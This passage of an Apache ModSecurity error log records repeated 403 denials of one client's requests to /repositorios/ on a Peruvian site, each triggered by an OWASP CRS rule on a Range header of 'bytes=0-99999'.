"958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUKvoDupyaoF2tAucqQAAAM4"] [Mon Feb 17 10:35:44.247444 2025] [:error] [pid 11230:tid 140634249742080] [client 190.102.150.245:36350] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUKvoDupyaoF2tAucqgAAAMQ"] [Mon Feb 17 10:35:44.341492 2025] [:error] [pid 10664:tid 140634224563968] [client 190.102.150.245:36352] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUAJrayd7JfpBdXs7sgAAAIc"] [Mon Feb 17 10:35:44.436417 2025] [:error] [pid 10664:tid 140634190993152] [client 190.102.150.245:36354] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUAJrayd7JfpBdXs7swAAAIs"] [Mon Feb 17 10:35:44.536471 2025] [:error] [pid 10664:tid 140634232956672] [client 190.102.150.245:36356] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUAJrayd7JfpBdXs7tAAAAIY"] [Mon Feb 17 10:35:44.633854 2025] [:error] [pid 10664:tid 140634107066112] [client 190.102.150.245:36358] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUAJrayd7JfpBdXs7tQAAAJU"] [Mon Feb 17 10:35:44.733855 2025] [:error] [pid 10662:tid 140634165815040] [client 190.102.150.245:36360] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUP_97XY8xax64gWTlQAAAA4"] [Mon Feb 17 10:35:44.832355 2025] [:error] [pid 10664:tid 140634149029632] [client 190.102.150.245:36362] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUAJrayd7JfpBdXs7tgAAAJA"] [Mon Feb 17 10:35:44.929094 2025] [:error] [pid 10662:tid 140634354153216] [client 190.102.150.245:36364] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUP_97XY8xax64gWTlgAAAAA"] [Mon Feb 17 10:35:45.025374 2025] [:error] [pid 10664:tid 140634115458816] [client 190.102.150.245:36366] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUQJrayd7JfpBdXs7twAAAJQ"] [Mon Feb 17 10:35:45.121498 2025] [:error] [pid 10664:tid 140634249742080] [client 190.102.150.245:36368] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUQJrayd7JfpBdXs7uAAAAIQ"] [Mon Feb 17 10:35:45.219966 2025] [:error] [pid 11230:tid 140634123851520] [client 190.102.150.245:36370] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUavoDupyaoF2tAucqwAAANM"] [Mon Feb 17 10:35:45.316436 2025] [:error] [pid 10662:tid 140634149029632] [client 190.102.150.245:36372] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUf_97XY8xax64gWTlwAAABA"] [Mon Feb 17 10:35:45.412639 2025] [:error] [pid 11230:tid 140634258134784] [client 190.102.150.245:36374] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUavoDupyaoF2tAucrAAAAMM"] [Mon Feb 17 10:35:45.509068 2025] [:error] [pid 11230:tid 140634149029632] [client 190.102.150.245:36376] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUavoDupyaoF2tAucrQAAANA"] [Mon Feb 17 10:35:45.606500 2025] [:error] [pid 11230:tid 140634354153216] [client 190.102.150.245:36378] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUavoDupyaoF2tAucrgAAAMA"] [Mon Feb 17 10:35:45.702948 2025] [:error] [pid 11230:tid 140634132244224] [client 190.102.150.245:36380] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUavoDupyaoF2tAucrwAAANI"] [Mon Feb 17 10:35:45.799724 2025] [:error] [pid 11230:tid 140634140636928] [client 190.102.150.245:36382] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUavoDupyaoF2tAucsAAAANE"] [Mon Feb 17 10:35:45.896370 2025] [:error] [pid 11230:tid 140634157422336] [client 190.102.150.245:36384] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUavoDupyaoF2tAucsQAAAM8"] [Mon Feb 17 10:35:45.993701 2025] [:error] [pid 11230:tid 140634224563968] [client 190.102.150.245:36386] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUavoDupyaoF2tAucsgAAAMc"] [Mon Feb 17 10:35:46.090091 2025] [:error] [pid 11230:tid 140634216171264] [client 190.102.150.245:36388] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUqvoDupyaoF2tAucswAAAMg"] [Mon Feb 17 10:35:46.186806 2025] [:error] [pid 11230:tid 140634266527488] [client 190.102.150.245:36390] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUqvoDupyaoF2tAuctAAAAMI"] [Mon Feb 17 10:35:46.288188 2025] [:error] [pid 11230:tid 140634174207744] [client 190.102.150.245:36392] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUqvoDupyaoF2tAuctQAAAM0"] [Mon Feb 17 10:35:46.388120 2025] [:error] [pid 10663:tid 140634165815040] [client 190.102.150.245:36394] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUrUcx1xj5z0EGUpRjwAAAE4"] [Mon Feb 17 10:35:46.488853 2025] [:error] [pid 10663:tid 140634157422336] [client 190.102.150.245:36396] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUrUcx1xj5z0EGUpRkAAAAE8"] [Mon Feb 17 10:35:46.586268 2025] [:error] [pid 11230:tid 140634207778560] [client 190.102.150.245:36398] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUqvoDupyaoF2tAuctgAAAMk"] [Mon Feb 17 10:35:46.682832 2025] [:error] [pid 11230:tid 140634107066112] [client 190.102.150.245:36400] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUqvoDupyaoF2tAuctwAAANU"] [Mon Feb 17 10:35:46.779814 2025] [:error] [pid 11230:tid 140634165815040] [client 190.102.150.245:36402] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUqvoDupyaoF2tAucuAAAAM4"] [Mon Feb 17 10:35:46.876759 2025] [:error] [pid 10664:tid 140634241349376] [client 190.102.150.245:36404] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUgJrayd7JfpBdXs7uQAAAIU"] [Mon Feb 17 10:35:46.973546 2025] [:error] [pid 10664:tid 140634098673408] [client 190.102.150.245:36406] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUgJrayd7JfpBdXs7ugAAAJY"] [Mon Feb 17 10:35:47.069930 2025] [:error] [pid 11230:tid 140634249742080] [client 190.102.150.245:36408] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXU6voDupyaoF2tAucuQAAAMQ"] [Mon Feb 17 10:35:47.179329 2025] [:error] [pid 10664:tid 140634132244224] [client 190.102.150.245:36410] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUwJrayd7JfpBdXs7uwAAAJI"] [Mon Feb 17 10:36:05.994330 2025] [:error] [pid 10664:tid 140634090280704] [client 190.102.150.245:36418] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXZQJrayd7JfpBdXs7vAAAAJc"] [Mon Feb 17 10:36:06.089427 2025] [:error] [pid 10663:tid 140634123851520] [client 190.102.150.245:36420] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXZrUcx1xj5z0EGUpRkQAAAFM"] [Mon Feb 17 10:36:06.187208 2025] [:error] [pid 10663:tid 140634098673408] [client 190.102.150.245:36422] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXZrUcx1xj5z0EGUpRkgAAAFY"] [Mon Feb 17 10:36:06.281533 2025] [:error] [pid 10662:tid 140634123851520] [client 190.102.150.245:36424] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXZv_97XY8xax64gWTmAAAABM"] [Mon Feb 17 10:36:06.385627 2025] [:error] [pid 10664:tid 140634354153216] [client 190.102.150.245:36426] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXZgJrayd7JfpBdXs7vQAAAIA"] [Mon Feb 17 10:36:06.478531 2025] [:error] [pid 10664:tid 140634157422336] [client 190.102.150.245:36428] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXZgJrayd7JfpBdXs7vgAAAI8"] [Mon Feb 17 10:36:06.576121 2025] [:error] [pid 10664:tid 140634123851520] [client 190.102.150.245:36430] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXZgJrayd7JfpBdXs7vwAAAJM"] [Mon Feb 17 10:36:06.675019 2025] [:error] [pid 10664:tid 140634224563968] [client 190.102.150.245:36432] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXZgJrayd7JfpBdXs7wAAAAIc"] [Mon Feb 17 10:36:06.771426 2025] [:error] [pid 10664:tid 140634190993152] [client 190.102.150.245:36434] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXZgJrayd7JfpBdXs7wQAAAIs"] [Mon Feb 17 10:36:06.864873 2025] [:error] [pid 10664:tid 140634232956672] [client 190.102.150.245:36436] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver 